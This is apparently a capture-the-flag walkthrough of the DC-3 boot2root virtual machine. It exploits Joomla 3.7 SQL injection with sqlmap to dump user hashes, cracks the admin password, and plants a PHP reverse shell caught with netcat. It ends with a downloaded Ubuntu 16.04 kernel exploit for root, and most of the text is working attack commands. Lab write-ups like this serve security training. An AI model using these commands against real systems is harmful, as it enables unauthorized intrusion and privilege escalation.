Hello friends! Today we are going to take another boot2root challenge known as “DC-3”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.
Security Level: Beginner
- Discovering Targets IP
- Network scanning (Nmap)
- Surfing HTTP service port
- Searching exploits via searchsploit
- Using SQLMAP to dump databases information
- Using John the Ripper to Crack the Password
- Login into JOOMLA
- Inject malicious PHP Reverse Shell Code
- Using Netcat for obtaining reverse connection
- Exploit the kernel
- Getting root access
- Reading Final flag
Let’s start off with scanning the network to find our target.
We found our Targets IP Address 192.168.1.104; Our next step is to scan our targets IP Address with nmap.
nmap -A 192.168.1.104
From nmap result we found only HTTP service is running on port 80 and we got to know that JOOMLA CMS is installed on this website.
So, we navigate to port 80 by exploring target IP in the web browser and read the text message of the admin, moreover the website was running on Joomla CMS as found above.
So to identify installed Joomla version, we checked its Readme file. We can clearly come to know about the version of Joomla 3.7, I think this is might come in handy.
We looked for Joomla 3.7 in searchsploit and found JOOMLA SQL INJECTION exploit. We copied the exploits 42033.txt file on our machine and read it contents. It revealed a Command for Sqlmap along with a vulnerable URL.
Then we executed given below sqlmap command and with the help of it we look for the Database names that revealed database 5 entries as shown in the image given below where I notice joomladb.
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Let’s again use Sqlmap to look for the tables and column.
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch
After getting the table names, we have dumped the contents of table #_users using sqlmap, which revealed credentials which that come in handy to log into JOOMLA. But the password is encoded, we need to crack it. Time to fire up John up.
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batch
We have saved the hash in our system and use john the ripper to crack the hash. Now we have both the credentials to log into Joomla.
Username- admin Password- snoopy
Let’s login into Joomla as admin.
After spending some time exploring, we got an idea to add a malicious PHP code (available inside kali: /usr/share/webshells/php) in index.php of beez3 template for getting reverse shell as shown below.
On the other side, we set up a netcat listener. Upon Execution, we got the shell of the target system. To get a proper shell, we have used the python one-liner to spawn the TTY shell.
nc -lvp 1234 python -c 'import pty;pty.spawn("/bin/bash")' uname -a lsb_release -a
From the LSB description, we clearly knew for this version of Ubuntu has a direct exploit which can be used to get the root access and found our final flag.
Without wasting time, we found a privilege escalation exploit for ubuntu 16.04. We have downloaded it and extracted it.
cd /tmp wget https://www.exploit-db.com/exploits/39772 unzip 39722.zip ls cd 39772 ls tar -xvf exploit.tar
After running the exploit, we have easily got the root access and thus got our Final flag.
ls cd ebpf_mapfd_doubleput_exploit ls ./compile.sh ls ./doubleput cd root ls cat the-flag.txt
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here